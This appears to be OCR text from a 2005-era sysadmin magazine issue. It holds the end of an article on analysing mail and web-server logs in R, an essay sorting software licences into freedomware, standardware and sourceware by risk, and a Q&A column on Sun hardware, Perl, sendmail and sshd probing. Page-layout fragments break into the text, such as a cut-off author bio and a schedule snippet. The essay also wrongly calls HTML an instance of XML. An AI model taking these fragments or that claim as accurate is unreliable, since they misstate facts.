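
if __name__ == "__main__":
    delays = [1, 2, 4, 6, 9, 20]    # hypothetical delays in seconds
    for label, value in six_number_summary(delays).items():
        print(f"{label:8s}{value:8.2f}")
```

For these delays, q1 falls between v = 2 and w = 4, so q1 = 0.75 * 2 + 0.25 * 4 = 2.5, and q3 falls between 6 and 9, so q3 = 0.25 * 6 + 0.75 * 9 = 8.25.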

The pairs() command (output
shown in Figure 2) shows a graphical
overview of the data. From this image, and
especially from the Time-Delay pair, you
can conclude that there are no major
delays. Also, imagine that you can automate
this procedure and have the information
sent to your email.

By using the attach() command with
a data set as an argument, you can use
the columns of the data set as individual
data sets. Thus, you can try the
hist(Delay) command to draw a histogram
of the frequencies of the delays
(after giving attach(MAILDATA)) and get
a more accurate view of the delay times.
By executing hist(Delay, xlab="Delay
in seconds", ylab="Number of emails",
labels=TRUE) you get the plot shown in
Figure 3.

A Web Server Application 

For this example application, data is
taken from a log file of a Web server. The
log file covers one day. Again,
the data is extracted using a combination of the
sed, awk, and grep utilities.

The first 10 lines of the data, including
the column titles, are shown in Table 3.

Note that the underscore in front of the
status code was added so that the
StatusCode value will not be considered a
numeric value by R.
The summary(WWWDATA) command gives the following output:

> summary(WWWDATA)
      Time          ServerBytes         ClientBytes       StatusCode
 10:46  :   3145   Min.   :       0   Min.   :   0.0   _304   :709255
 10:58  :   3081   1st Qu.:     140   1st Qu.: 401.0   _200   :435146
 10:55  :   3066   Median :     142   Median : 435.0   _302   :  7371
 10:37  :   3054   Mean   :    2460   Mean   : 438.1   _404   :  4641
 10:32  :   2959   3rd Qu.:     407   3rd Qu.: 470.0   _500   :  3983
 09:30  :   2814   Max.   :49083902   Max.   :2158.0   _206   :  2254
 (Other):1144676                                       (Other):   145
>
Notice that the busiest minute was 10:46, when 3145 requests were
served. Again, note that the underscore in front of the status code
was added so that the StatusCode value will not be considered a
numeric value by R.

For more analysis, get all the data for the 12:00 to 12:59 timeframe
(grep '^12' WWWDATA.data). This data set is named WWW12.
Execute the pairs(WWW12) command. The output is shown in Figure 4.
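
The two steps above (finding the busiest minute and selecting the 12:00 to 12:59 records) can also be sketched in Python. This is an illustration under assumptions: the rows are a handful of made-up records in the Table 3 column order (Time, ServerBytes, ClientBytes, StatusCode), and the function names are hypothetical.

```python
from collections import Counter


def requests_per_minute(rows):
    """Count how many records share each HH:MM value (first column)."""
    return Counter(row[0] for row in rows)


def select_hour(rows, hour):
    """Keep only records whose time starts with the given hour,
    the equivalent of grep '^12' for hour=12."""
    prefix = f"{hour:02d}:"
    return [row for row in rows if row[0].startswith(prefix)]


# Made-up sample records: Time, ServerBytes, ClientBytes, StatusCode
rows = [
    ("10:46", 141, 433, "_304"),
    ("10:46", 0, 426, "_200"),
    ("12:20", 142, 437, "_304"),
    ("12:24", 114096, 465, "_200"),
]

busiest_minute, hits = requests_per_minute(rows).most_common(1)[0]
www12 = select_hour(rows, 12)
print(busiest_minute, hits, len(www12))
```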

Also, the summary(WWW12) command gives the following output:

> summary(WWW12)
      Time        ServerBytes        ClientBytes       StatusCode
 12:20  : 2003   Min.   :      0   Min.   :   0.0   _304   :45986
 12:24  : 1848   1st Qu.:    141   1st Qu.: 403.0   _200   :28914
 12:55  : 1800   Median :    142   Median : 436.0   _302   :  570
 12:16  : 1789   Mean   :   2273   Mean   : 444.6   _404   :  292
 12:01  : 1744   3rd Qu.:    407   3rd Qu.: 480.0   _500   :  214
 12:19  : 1713   Max.   :2631733   Max.   :1230.0   _206   :  124
 (Other):65217                                      (Other):   14
>



See Table 4. 

The main benefit of using R for systems administration is that 
you get a different perspective of your data, which can be useful as 
well as informative. 


Figure 4 pairs(WWW12) output (scatterplot matrix; panels: Time, ServerBytes, ClientBytes, StatusCode)
School Teacher. He holds a B.Sc. in Mathematics and a M.Sc. in IT from
University College London. Before teaching, he worked as a Unix systems
administrator and an Oracle DBA. Mihalis can be reached at:
tsoukalos@sch.gr.


Table 3 Data from a Web server log file

Time   ServerBytes  ClientBytes  StatusCode
00:00  141          433          _304
00:00  142          437          _304
00:00  0            426          _200
00:00  142          435          _304
00:00  142          431          _304
00:00  114096       465          _200
00:00  141          436          _304
00:00  0            295          _200
00:00  141          434          _304


Table 4 Explanation of error types

Status Code  Error type     Explanation
1xx          Informational  This series of responses is not currently used.
                            They are reserved for future use.
2xx          Success        The action was successfully received, understood,
                            and accepted. Status code 200 is used to indicate
                            a successfully retrieved Web page.
3xx          Redirection    Further action must be taken in order to complete
                            the request. For example, code 301 can be used to
                            indicate that a page has been moved and the
                            browser may be redirected to the new page.
4xx          Client Error   These codes are returned when a browser has made
                            a request that can't be fulfilled.
                            "404 - URL not found" is probably the most
                            commonly seen.
5xx          Server Error   The server failed to fulfill an apparently valid
                            request.
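
The grouping in Table 4 depends only on the first digit of the status code, so it is easy to apply to the StatusCode column. The sketch below is a Python illustration; the function name status_class is hypothetical, and it accepts codes with or without the leading underscore used in Table 3.

```python
# Class names as listed in Table 4, keyed by the first digit of the code.
STATUS_CLASSES = {
    1: "Informational",
    2: "Success",
    3: "Redirection",
    4: "Client Error",
    5: "Server Error",
}


def status_class(code):
    """Map a status code such as '_304' or 404 to its Table 4 error type."""
    digits = str(code).lstrip("_")
    if len(digits) != 3 or not digits.isdigit():
        raise ValueError(f"not a three-digit status code: {code!r}")
    return STATUS_CLASSES.get(int(digits[0]), "Unknown")


if __name__ == "__main__":
    for code in ("_304", "_200", "_404", "_500"):
        print(code, status_class(code))
```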
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OPEN SOURCE 


Licensing Risks, Not Revolutions 

Bryan J. Smith


The primary role of IT is to mitigate risk to corporate investments
in information. Simple labels on software like “open”
or “proprietary” do little to classify risk to an organization’s
data and IP. In this article, I’ll examine these labels and suggest
some new ways to define software types.

One-Dimensional Thinking 

Is it open or proprietary? How do you define open or proprietary?
The concepts themselves are relative to differing viewpoints.
Such one-dimensional variables with only two extremes offer a poor
way to categorize software and its licenses.

Some may argue these two extremes are enough. As you read
this, you may associate these terms with the flagship licenses of the
open and proprietary world, the GNU General Public License
(GPL) and the Microsoft End User License Agreement (EULA),
respectively. Other examples may come to mind, but the categories
seem distinct enough to most. But what about other, lesser known
licenses? Do these extremes of “open” and “proprietary” represent
them well?

The term “open” is very relative, especially in terms of marketing.
Some consider it to mean “open source.” Others consider it to mean
“open standard,” or possibly the older concept of “open systems.”
What about “open IP”? Does open IP offer freely redistributable
derivatives? Is it merely royalty-free for specific uses? Or is it only
under “fair and reasonable” licensing terms? Viewpoints will be relative.

Putting those arguments aside for a moment, it is easy to forget
a major role of IT and IT policy. A major role of IT is to mitigate
risk to data, data that represents hundreds, thousands, possibly
even millions of man hours in creation. The actual risk to data is
the ultimate consideration in IT. So the one-dimensional terms
“open” or “proprietary”, when applied as labels to software and its
licenses, do little to represent an adequate assessment of the risk
in deployment at an organization.

Two-Dimensional: Fidelity Squared 

By merely adding another dimension to the argument, we add
far greater fidelity and square the number of categorizations. The
question is, then, what two variables should we use for software?

I suggest these two:

• Variable: source code availability

• Variable: standards compliance

All software has available source code, at least at some point in
release. All software conforms to some set of standards. What values
can we now associate with source code availability and standards
compliance? Let's revisit the terms of the original, one-dimensional
argument:

• Value: open

• Value: closed (proprietary)

Using the 2D model, we can move from two categories to four as
illustrated in Figure 1:

• Open source, open standard 

• Closed source, open standard 

• Open source, closed standard 

• Closed source, closed standard 

The concept of using a 2D model 
for social constructs is nothing new. 
Software licenses are 100% social 
construct, so they tend to follow 
social tendencies. 

As an analogy, the values of “conservative” and “liberal” applied
to the two axes of “individual” and “fiscal” have been used to categorize
American political parties more effectively than just the one-dimensional
values on their own. Even though most Americans
associate “conservative” and “liberal” with the two most popular
American political parties, by merely adding the second dimension
of thought, we can now categorize other parties such as the
American Libertarian party (“fiscally conservative, individually
liberal”). Of course, the values will always be relative. Continuing our
analogy to the American political system, both of the two popular
American political parties tend to be “conservative” compared with
various European viewpoints.

The same is true of software licenses. The terms “open” and
“closed” mean different things from different viewpoints, especially
from the ultimate consideration of risk. To begin, let us consider the
three of the four license categories that are at least “open” in one form
or another, breaking down both their categorizations and risk of
deployment.
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Categorizing Open Software 

Consider the viewpoint of an “open source” advocate. Now
consider the viewpoint of an “open standards” proponent. And
consider the viewpoint of a proprietary software vendor who
offers some level of “open standards” support. Next, explain the
term “open software”. And to throw yet another popular term into
the mix, describe “vendor lock-in”, given these varying levels of
“open software”.

Instead of using these popular and varying terms of “open software,”
I think it would be more effective to define a new set of terms
based on our 2D standards versus source code model. Let’s begin
with these three “open software” types: open source, open standard;
closed source, open standard; and open source, closed standard.

As much as I admire Richard Stallman, I do not admire his insistence
on using the term “free software.” I can understand his reasons,
just as I can understand why others use the term “hacker” to profess
technical prowess. Unfortunately, like the modern definition of “hacker,”
the majority viewpoint defines what the term “free software”
means, not the minority one. The majority considers the term “free
software” to mean free of cost, not freedom. Some even refer to
Linux as the “shareware version of UNIX”. The term “freedom
software” is a bit long, and “freeware” has all the original connotations
of being free of cost.

So, let’s build on an obvious idea and call “open standard, open
source” software freedomware for short:

• Freedomware: open source, open standard

• Freedomware must be free to use, free to modify, and free to
redistribute.

• Freedomware must be free of IP restrictions and requirements.

Another obvious term comes from the shortening of “standards-based
software”. Such standardware is software that has “closed
(proprietary) source”, but adheres to “open standards”. This is a
gray area, and some implementations may be considered more
moderate than near the extremes of standards or source. For
example, does potential standardware merely export/import standards?
Or, worse yet, does it embrace standards but modify them
in a way that only the product works with its own implementation? At
what point does it implement a “closed (proprietary) standard”
and not an “open standard”?


Figure 1 Standard v. source of values open and closed 
• Standardware: closed source, open standard

• Standardware must either follow strict standards or fully publish
all new standards as implemented, so that they can be re-created in
another product.

• Standardware must produce data that can be fully read into
another product, ideally one that already exists.

• Standardware that introduces new standards or new data formats
may not be encumbered by any additional license or IP restrictions.

And last of the “open software”, a rarer implementation is sourceware.
A variation of freedomware, sourceware offers “open source”
code with “closed (proprietary) standards”. At first this may sound
like an oxymoron, but sourceware is very common. Vendors are free
to put restrictions on software, even when source code is released
into the open, in a variety of ways:

• Sourceware: open source, closed standard

• Sourceware allows vendors to “open” source code but restrict the
ability to publicly distribute derivatives or otherwise freely
redistribute the software.

• Sourceware could be freedomware that requires a non-freedomware
library or support module, or that uses IP that does not
have an “open” license.

• Sourceware could be freedomware that has been modified in a
way that cannot be redistributed publicly.
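
The three terms map directly onto the 2D model: each is one combination of the two variables. As a minimal sketch of that mapping (an illustration only; the function name classify is hypothetical, and the closed source, closed standard quadrant is returned as None because it has not been given a new name here):

```python
from itertools import product


def classify(open_source, open_standard):
    """Name the quadrant of the source/standard model, or None if unnamed."""
    if open_source and open_standard:
        return "freedomware"
    if open_standard:
        return "standardware"   # closed source, open standard
    if open_source:
        return "sourceware"     # open source, closed standard
    return None                 # closed source, closed standard


if __name__ == "__main__":
    for src, std in product((True, False), repeat=2):
        label = classify(src, std) or "(closed source, closed standard)"
        print(f"open source={src!s:5}  open standard={std!s:5}  ->  {label}")
```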

To reiterate, I offer these categorizations for “open software” to
simplify discussions, such as mitigating risk.

Mitigating Open Software Risk 

Adopting freedomware, standardware, or sourceware carries
risk to corporate investments in data. Looking at each, let’s
consider four factors of risk: standards compliance, support and
modification, exit strategy, and software or IP requirements.

Standards Compliance 

When considering standards compliance, we can ask the following:
Is it inherent to the software (base formats)? Is it done
simply for import/export? And how common are the formats?

Standards compliance is a consideration of utmost importance
for mitigating long-term risk to data and corporate investments
in data. Even the most proprietary of software vendors claims
“standards compliance” in their products. But standards themselves
are hard to define. Consider this a major risk.

Freedomware, standardware, and sourceware should use existing,
well-established formats. If they define their own, are they
standardized with another party, or are they supported by other
applications? Many people consider freedomware and sourceware
to be self-standardizing, but if no other application supports the
format, this could be an area of major, potential risk. In fact,
freedomware can and sometimes does result in eccentric formats,
although one could argue that’s how some of the greatest software
innovations have come about.

Documented standards are one thing, but proliferated stan¬ 
dards with documentation greatly reduce risk. Source code itself 
is not an ideal method of documentation or standardization 
(although it can expose differences between the documented 
standard and actual software). 

Standardware has no source, so it is not self-revealing.
Standardware then becomes a matter of independent verification
and possible testing to be compliant with well-established and
“open standards”. If it’s not compliant, it is not standardware.
Beware of software that does not use “open standards” by default in
its inherent format, but only offers limited support, possibly only as
an import/export function. Such software is not standardware.

Also know that XML on its own is not an “open standard”. XML
is merely a standard for creating new standards, largely to answer
vendor complaints that standards organizations, such as the World
Wide Web Consortium (W3C), are too slow in adopting. HTML is
an instance of XML from the W3C. HTML provides support to
XML to fully define itself. So, if a vendor claims to use XML,
inquire whether they have registered their entire XML standard,
including all document type definitions (DTDs) and supporting
XML schema, with well-established, independent organizations like
the Organization for the Advancement of Structured Information
Standards (OASIS), considered the primary registrar of completely
documented XML instances.

Support and Modification 

Ultimately any software is under the support and maintenance
of one or more entities. But what if changes are needed to the
software (patches, fixes, special needs, etc.)? For each license, you
should consider support and modification.

Freedomware may be released by a commercial entity, by the
community, or a combination. If a commercial entity is involved, a
profit motive must be considered. Do they rely on other markets
(hardware) or dual-license the software as non-freedomware? Or
does the software prefer non-standard formats by default, which is
not freedomware (or “open software” at all)?

Ideally, various support offerings should be available, from
per incident to SLAs (service level agreements). What if your
organization modifies the software but does not want to distribute
the changes? Is it allowable under the license to turn the freedomware
into internal-only, corporate-specific sourceware
(which is allowable under the GPL)? Or can organizations license
such modifications, if they're not publicly distributed?

In the case of standardware or sourceware, is the vendor the sole
maintainer? Partnerships with industry developers or the community
are ideal, because they help distribute the burden of support.
Vendors (and partners) should offer SLAs, which may be part of
their profit strategy. Dual-licensing is a key consideration, especially
if the standardware or sourceware is also available as freedomware.
Always consider how patches, fixes, and other changes
are made, and whether that release model is sound. The need to
maintain additional, internal staff for internal structure to ensure
configuration management is vastly underestimated, especially in
the case of more eccentric freedomware. Many freedomware adoption
projects fail because organizations assume they will save on the
costs of release and configuration management as well as licensing.
Nothing is further from the truth.

Exit Strategy 

No one should assume that freedomware is self-maintaining or
perpetual from a risk standpoint. If the maintenance behind freedomware
or sourceware dissolves, is there an internal or community
effort to continue development of the project? Additional mitigation
costs are often overlooked in risk assessment. In the case of sourceware,
does the vendor plan to offer the source code under a different
license if they discontinue the product?

If the commercial standardware vendor dissolves, lack of 
access to source code becomes a major risk. Is the standardware 
already available as compatible freedomware or sourceware? 
Standardware that is also available as freedomware or sourceware 
reduces this risk. Of course, the ideal standardware is one that is 
not discontinued, because the costs ultimately fall onto the few 
(or many) who continue to use it. Proliferation, or lack thereof, of 
any “open software” heavily influences the amount of risk in any 
software adoption. 

In all cases (and most locales), understand that copyright law is
the ultimate rule, and the copyright holder reserves all rights.
Copyrights are the key issue when it comes to exit strategy. An exit 
strategy should be defined by the copyright holder in the license 
should the software ever be discontinued. Do not assume any exit 
strategy from the copyright holder(s) unless explicitly stated. 
Otherwise the software is a major risk in the absence of any other, 
compatible solution. 

Software or IP Requirements 

Software that relies on platforms, libraries, and other components,
especially those with technical and licensing requirements that are
incompatible with the software license, introduces a major but often
overlooked risk. A company cannot afford to use any “open software”
when both technical and licensing requirements are not met. Much
software requires support beyond the control of the entity actually
licensing the software. No recourse with the copyright holder may be
possible if these requirements go unmet, as they are external to the
software purchased and under contract.

Freedomware that requires software or IP licenses (e.g., non-open
patent licenses) should be considered sourceware. If the sourceware
relies on software that is not "open", such as OS, libraries,
databases, or other system/network interfaces, what steps can be taken
to mitigate the risk of these requirements not being available? Is the
sourceware also available as freedomware whereby it does not
require these "closed" capabilities? If so, why is it not being
implemented as such? This risk may even transgress into the realm of
indemnification, whereby software has external requirements,
which are unlicensed by the organization deploying it.

Standardware risk mitigation should avoid these external
requirements as well. If it does not, has the commercial entity
guaranteed access to these requirements? Have they explained why they
are required for the system and why they are not using "open"
requirements? Do they offer or is there equivalent freedomware that
does? Nothing is worse from a risk standpoint than licensing and
implementing a product that does not contain everything necessary
to function, and where the licenser cannot be held liable for those
other requirements. Indemnification is a real issue for entities,
regardless of software license.

Examples of Mitigating Open Software Risk 

Theory and discussion are useful, but examples go a long way
toward explaining how real-world "open" software mitigates
corporate risk. Let's consider an "open" office suite, document/print
rendering language, Web browser, and Web authoring tools.

OpenOffice XML — Freedomware, 
Standardware, and Sourceware 

The "open" office suite is highlighted by and starts with Sun's
acquisition of Star Division. Sun released the source code of StarOffice
5 to the community under a dual-license strategy of freedomware
LGPL (Lesser GPL) and sourceware SCSL (Sun Community
Source License). To protect its copyright of the software, under the
OpenOffice.org project, Sun recommends all developers who submit
more than 10 lines of code sign over a non-exclusive copyright
to Sun. The eventual result of the community-driven development
(with half of the OpenOffice.org team being paid employees of
Sun) was a complete set of XML standards that have been fully
standardized by OASIS as OpenOffice XML. The end-user products
include the freedomware LGPL OpenOffice.org suite and the
standardware StarOffice product.

Considering the factors of risk, the OASIS standardization of
OpenOffice XML was supported by not only Sun, but also by Corel
(another suite developer) and Boeing (the de facto standard setter in
the engineering world for corporate-wide documentation, from
office to factory floor). In addition to the OpenOffice.org and
StarOffice products, the LGPL license on the code means any and
all commercial software is free to use the code for either inherent or
import/export support. This has occurred in many products, from
AOL's office suite to the WordPerfect series of products from Corel
(discussed below under "closed software"). Likewise, under the
LGPL license, any changes to the functionality of the code
responsible for OpenOffice XML (not necessarily other components) must
be shared with the OpenOffice.org project. In addition to Sun, these
LGPL and SCSL licensees are also providing their own support.

OpenOffice XML has become the standard for mitigating risk
in documentation, from small offices to engineering giants like
Boeing. The standardware StarOffice product includes release
and configuration management components and support offerings
from Sun. Many components are self-contained and platform
agnostic, reducing reliance on other system/library components.
Thus, freedomware OpenOffice.org and standardware StarOffice
are of minimal risk to adopt.

Adobe Postscript/PDF — Freedomware, 
Standardware, and Sourceware 

For non-editable documentation and print publication, Adobe's
PostScript language is considered de facto standard freedomware
and sourceware, depending on the Adobe IP (patents) involved.
Freedomware can write PostScript and PostScript-derived PDF files
that are free of Adobe IP. Various standardware and sourceware can
write both IP and IP-free PostScript/PDF formats. Not surprisingly,
OpenOffice supports direct export to PostScript/PDF.

Adobe sells most of its software based on the capabilities of
the end-user applications in comparison to freedomware and other
standardware equivalents, and not by hoarding specifications of its
document formats.

Documentation rendered in IP-free PostScript/PDF should be
considered low-risk, although only for non-editable documentation
(use as appropriate). IP requirements may introduce some
risk because they may not be viewable under IP-free
freedomware. Adobe's financials are extremely positive, and the
focus of their software is on offering value over freedomware and
other equivalents. They are currently platform-centric to Win32
and MacOS X, however.

AOL-Netscape — Freedomware, 
Standardware, and Sourceware 

Like Sun's office suite, AOL-Netscape's browser is highlighted
by the release of its source code. The result was the Gecko engine,
which is licensed under a dual-MPL (Mozilla Public License)/commercial
license. Gecko is embedded into countless devices and software,
from phones to development suites. Unlike AOL-Netscape's
prior version 4 and earlier browsers, the resulting Gecko engine and
Mozilla source code complies fully and to the letter with many
XML W3C Web standards, such as HTML, CSS, XHTML, and
others. It also defines several new XML, OASIS-standardized
formats. The end-user products include the freedomware Mozilla
suite, individual software components (i.e., Firefox, Thunderbird,
Sunbird, etc.), and the standardware Netscape browser. Neither
implements platform-specific capabilities, such as Win32 ActiveX,
which coincidentally makes them lower risk from a network security
consideration, regardless of platform, as the code is very
platform-agnostic.

Newer developments in both products include release and 
configuration management tools, and support is available from 
AOL-Netscape for standardware Netscape. Freedomware Mozilla 
and standardware Netscape should be considered low-risk. 

Macromedia Standardware and 
Sourceware 

Macromedia's suite of products (Dreamweaver, Fireworks,
and Flash) inherently supports “open” standards also supported
by various other freedomware, standardware, and sourceware.
This includes many well-established XML standards, such as
HTML, CSS, PHP, and other industry organization standards like
JavaScript. Macromedia also offers a proliferated, fully
documented, self-standard in Flash sourceware (which was not
always the case), and increasing support for XML equivalents
like Scalable Vector Graphics (SVG, which also offers motion
vector graphics). Macromedia sells its products based on inherent
features and project management capabilities, as well as end-user
features, and not by hoarding specifications of its document formats
(not even Flash).

Using Macromedia products is low risk, depending on what
features are utilized. IP requirements (largely Flash) increase risk.
Financials are extremely positive, with standardware products
offering value over freedomware and other equivalents. They are
currently platform-centric to Win32 and MacOS X, however.

Conclusion 

The risk to an organization's long-term investment in data
must be mitigated for an organization to survive. A successful IT
professional must always discuss software adoption in terms of
detailed risk reduction, not of revolution. In this article, I
introduced three "open software" categorizations and dissected their
factors of risk:

• Freedomware (open source, open standard) 

• Standardware (closed source, open standard) 

• Sourceware (open source, closed standard) 

In Part 2, I will expand on not only the remaining categorization,
commerceware (closed source, closed standard), but will discuss
a fifth categorization that may result from any type of software.
Such software holds the data of an organization hostage, and is of
the ultimate risk. Our graph can still represent it, just not in its
current form.

Bryan J. Smith has an educational background in engineering (BSCpE,
UCF) and has spent much of his 12-year career applying engineering
principles of risk mitigation to corporate investments in the aerospace,
civil, educational, financial, semiconductor, and software industries.
For the past 4 years, he has provided engineering, IT, and training
services to a variety of clients, including managing financial network
security at two Fortune 100 companies. Mr. Smith and his wife, Lourdes,
live in Orlando. He can be reached at: b.j.smith@ieee.org.
Remote Access            2/1/05    3/1/05
Database       July      3/1/05    4/1/05
Security       Aug       4/1/05    5/2/05

For more detailed information, refer to the author guidelines on our
Web site: www.sysadminmag.com. Please send proposals, manuscripts, and
requests for guidelines to:

Sys Admin
Managing Editor
Rikki Endsley
Email: rendsley@cmp.com
Phone: (785) 838-7555
Amy Rich

Submit questions to: http://www.sysadminmag.com/quest/

Q We have an old Sun E250 that's acting as a test database
server. During a maintenance window, we replaced a power
supply that had died, but the new power supply didn't work
either. We then tried it with a known good power supply from a
functioning machine and it still failed. Do we need to replace
the backplane in the machine to get the second power supply
back online?

A Most likely the problem is that you've run into an issue with
the power supply memory latch function. From the E250
product notes:

The Sun Enterprise 250 power supply has a memory latch function
that allows the power supply to remember its last power on/off state
in response to a power outage or removal of the AC power cord.

This feature allows the power supply to resume operation
automatically once power is restored. It also enables hot-swapping of
power supplies.

Under some circumstances, this feature can be misdiagnosed as a
power supply failure. If you remove a power supply from a system
that is powered off and attempt a hot-plug installation into a system
that is powered on, the power supply will remain in the Off state.

This should not be interpreted as a power supply failure. To activate
the power supply, simply turn the front panel keyswitch from the
Power-On position to the Diagnostics position, and then back to the
Power-On position. Alternatively, you may press the Power-On key
on a Sun Type-5 keyboard attached to the system.

If there is a hardware failure that's not the power supply itself, it
may be with the DC Power Distribution Board, part number
501-4683, or the system board, part number 501-5440.

The E250's power components are detailed at:

http://sunsolve.sun.com/handbook_pub/Systems/E250/ \
component.power.html

The exploded system view is at:

http://sunsolve.sun.com/handbook_pub/Systems/E250/ \
component.exploded.html

The wiring diagram is at:

http://sunsolve.sun.com/handbook_pub/Systems/E250/wiring_1.html

Q I'm a Bourne shell programmer who's been thrust into the role
of developing some Perl code. Is there anything in Perl similar
to sh -x to trace the program execution?

A If you take a look at the man page for perlrun, it suggests the
following:

All these flags require -DDEBUGGING when you compile the Perl
executable (but see Devel::Peek, which may change this). See the
INSTALL file in the Perl source distribution for how to do this. This
flag is automatically set if you include -g option when "Configure"
asks you about optimizer/debugger flags.

If you're just trying to get a print out of each line of Perl code as it
executes, the way that sh -x provides for shell scripts, you can't use
Perl's -D switch. Instead do this:

# If you have "env" utility

env PERLDB_OPTS="NonStop=1 AutoTrace=1 frame=2" perl -dS program

# Bourne shell syntax

$ PERLDB_OPTS="NonStop=1 AutoTrace=1 frame=2" perl -dS program

# csh syntax

% (setenv PERLDB_OPTS "NonStop=1 AutoTrace=1 frame=2"; \
perl -dS program)

You can also try running Perl with -Dlts to get some useful
debugging output.


Q I run sendmail 8.12.11 for a small subset of domains and know
it reasonably well. I want to add some spam filtering
functionality, but I don't want to rely on a number of more complicated
programs like procmail or milter, etc. I'm really looking for some
rulesets that I can plug into my mc file instead of additional
programs I can use to supplement sendmail. Any suggestions?

A There are a number of hacks out there and a lot you can do
with DNSBLs and regular expression matching that could cut
down on your spam. You can also use the access functionality to
block huge swathes of IPs and/or domains if you want to really limit
whom you receive mail from. If you're looking for some pre-rolled
rulesets, you might want to check SpamFilters:

http://www.visi.com/~hawkeyd/spamfilters.html

Be aware that your spam blocking could have a significant negative
impact on your mail delivery if you're doing a lot of expensive
lookups and/or handling a lot of mail.

Q I've been looking at adding some extra RAM to an old Sun U5
I have acting as a desktop. I've found some sites that say that
they can sell me 256M strips, but Sun seems to claim that the U5s
only support up to 128M strips and that I need a U10 for 256M
strips. Can I actually put the 256M strips into the machine, or are
the sites selling them incorrect?

A The U5 and the U10 have exactly the same motherboard and
support the same components. The difference between the U5
and the U10 is the chassis. The U5 has a smaller chassis than the
U10 and therefore didn't have the room to hold full-height 256M
DIMMs. If you purchase low-profile 256M DIMMs, though, you
can put them into the Ultra 5 without any modification. If you
purchase regular-height DIMMs, then you'll need to remove the
floppy drive because the taller DIMMs get in the way of the UPA
slot on the motherboard in the U5.

Q I've been seeing a number of connections to sshd for the users
"test" and "guest". Neither of these accounts exists on my
systems, so I figured that this was some sort of scanning effort by
hackers to try to get into my machines. Should I be concerned, or is
this just simple fishing?


A There are several ssh scanners that crackers are using these days,
often distributed as ssh.tgz. One kit that I've seen contains a
network scanner that scans a user-supplied netblock, collects IP
addresses running sshd, then tries to connect to the identified host as a
default user (guest, test, root, admin, etc.). Mostly these crackers are
looking for default accounts/passwords set during an install of a
specific OS distribution. The payload could be easily adapted to exploit
any holes in sshd, of course, but that's not generally the aim.

If you're running an OS without any default accounts/pass¬ 
words then you should be reasonably safe. For any non-user 
accounts, be sure to add them to the DenyUsers or DenyGroups 
line of the sshd configuration file as well as disabling the 
accounts at a system level (locking the password field, giving 
them invalid shells, and possibly also giving them invalid home 
directories). 
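
To gauge how much of this probing a host is seeing, a short script can tally the unknown-account attempts from the sshd log. The following is only a sketch: it assumes OpenSSH reports such attempts as "Invalid user NAME from ADDRESS" (older releases say "Illegal user"), and the sample lines are hypothetical, so adjust the pattern to whatever your syslog actually records.

```python
import re
from collections import Counter

# Assumed message format: "Invalid user NAME from ADDRESS"
# (older OpenSSH releases log "Illegal user" instead).
PROBE = re.compile(r"(?:Invalid|Illegal) user (\S+) from (\S+)")


def count_probes(lines):
    """Return (per-user, per-source) counters for unknown-account logins."""
    users, sources = Counter(), Counter()
    for line in lines:
        match = PROBE.search(line)
        if match:
            users[match.group(1)] += 1
            sources[match.group(2)] += 1
    return users, sources


# Hypothetical sample lines; real input would come from the system auth log.
sample = [
    "sshd[811]: Illegal user test from 192.0.2.10",
    "sshd[812]: Illegal user guest from 192.0.2.10",
    "sshd[813]: Invalid user test from 198.51.100.7",
    "sshd[814]: Accepted publickey for amy from 203.0.113.5",
]

users, sources = count_probes(sample)
print(users.most_common())    # account names probed, most frequent first
print(sources.most_common())  # source addresses, most frequent first
```

Feeding it the real log is a matter of passing an open file object instead of the sample list.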

Q I have a 220R running Solaris 8, and I'm trying to run the
sysdef command to get some information about the
machine. When I run sysdef, I get a weird error. The command
works fine on other machines of the same type running the same
OS, though. I've deleted the actual hostid in the output below, but
the rest is the same:

*
* Hostid
*
  ********
cannot open /dev/kmem

The permissions on /dev/kmem, the file it actually points to, and
sysdef are:

lrwxrwxrwx 1 root other 27 May 28 2002 \
/dev/kmem -> ../devices/pseudo/mm@0:kmem

crw-r----- 1 root sys 13, 1 May 28 2002 \
/devices/pseudo/mm@0:kmem

-r-xr-xr-x 1 root sys 31520 May 28 2002 \
/usr/sbin/sparcv9/sysdef

As far as I can tell, everything looks just fine, so why am I getting an
error?

A Presumably if you run this command as root it works fine?

The sysdef binary needs to be SGID sys in order to be run
by non-root users. Perhaps you've removed SGID/SUID
permissions to harden this particular machine or someone accidentally
or maliciously changed the machine. Check the md5 signatures
on the system just to be certain if you don't know how the file
got changed.
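
When comparing a suspect machine against a known good one, it can help to test the set-group-ID bit directly instead of reading ls output by eye. This is a minimal sketch using Python's standard stat module; the two mode values are illustrative only (the second shows what a listing looks like once SGID is set) and are not taken from a reference Solaris install.

```python
import stat


def has_setgid(mode):
    """True if the set-group-ID bit is present in a st_mode value."""
    return bool(mode & stat.S_ISGID)


def describe(mode):
    """Render a st_mode value the way ls -l would show it."""
    return stat.filemode(mode)


# Illustrative modes: the first matches the -r-xr-xr-x listing in the
# question, the second is the same file with the SGID bit added.
stripped = stat.S_IFREG | 0o0555
with_sgid = stat.S_IFREG | 0o2555

for mode in (stripped, with_sgid):
    print(describe(mode), "SGID" if has_setgid(mode) else "no SGID")
```

On a live system the mode would come from os.stat(path).st_mode for the binary in question.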

Q We have a number of home users running Linux (Fedora Core 2)
who need to set up a packet filter of some sort to increase
security. We've told our users to install and configure iptables, but some of
them aren't that technically inclined. Could you point me to some
good resources to help the less Linux-oriented users get up to speed?


A There's a lot of information out there on iptables, starting with 
the Netfilter Web site: 

http://www.netfilter.org/documentation/index.html#documentation-howto

If you're looking for something to help your users generate config¬ 
uration files without having much iptables knowledge, take a look at 
FireHOL: 

http://firehol.sourceforge.net/ 

While the configuration language still looks rather technical, it 
abstracts the iptables rules into more generic statements about the 
services that a machine runs. 

Q I'm trying to use sendmail 8.12.11 LMTP with procmail as the
local delivery agent. I've modified the mc file thusly:

define(`LOCAL_MAILER_ARGS', `procmail -Y -a $h -z')

define(`LOCAL_MAILER_FLAGS', `SPXhmnz9')

define(`LOCAL_MAILER_DSN_DIAGNOSTIC_CODE', `SMTP')

Unfortunately, I'm losing the plussed detail when I try to deliver
messages to multiple recipients. As an example, when a message is
delivered to mary+de@domain.name and bob+tail@domain.name,
the plus detail for both mary and bob is "de" because mary's address
was processed first. I realize that this is probably the side effect of
the -a switch to procmail, since the procmail man page says:

-a argument This will set $1 to be equal to argument. It can be used
to pass meta information along to procmail. This is typically done by
passing along the $@x information from the sendmail mailer rule.

So, how do I work around this so that each recipient gets the correct
individual plus detail?

A There's an LMTP patch for procmail 3.22 available
from Claus Aßmann's Web page at Sendmail:

http://www.sendmail.org/~ca/email/patches/procmail.lmtp.p0

After patching, invoke procmail as procmail -z+ to get the correct
LMTP functionality.

